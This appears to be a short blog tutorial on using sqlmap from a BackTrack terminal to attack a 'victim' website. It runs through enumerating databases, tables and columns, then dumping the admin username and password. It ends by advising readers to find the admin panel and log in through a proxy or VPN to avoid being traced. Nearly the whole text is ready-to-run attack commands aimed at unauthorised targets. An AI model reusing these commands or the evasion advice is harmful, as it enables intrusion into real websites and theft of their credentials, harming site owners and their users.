1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
data:image/s3,"s3://crabby-images/19d51/19d519215c264182ea93afaa91cbf1f287f3bbe9" alt=""
data:image/s3,"s3://crabby-images/a2b11/a2b110862342ac83ae1e6787a9b5a5fc80ec1195" alt=""
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
4. Now you will get the database name of the website
data:image/s3,"s3://crabby-images/7acc7/7acc7767e71a634bb4756e84c717a77d1d4d3f02" alt=""
5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
data:image/s3,"s3://crabby-images/b3688/b36880ec3ff66df998e4c04ff546325501d9333e" alt=""
data:image/s3,"s3://crabby-images/99eab/99eabdbf5723b82eeeb1126dd8de74b496b6420e" alt=""
data:image/s3,"s3://crabby-images/f3d55/f3d55e8e97182c137f817b91b94dcaa2901ea874" alt=""
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website !
data:image/s3,"s3://crabby-images/2399a/2399a15c5bd3e86b2e435d432e964e84cceb107f" alt=""
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
0 comments:
Post a Comment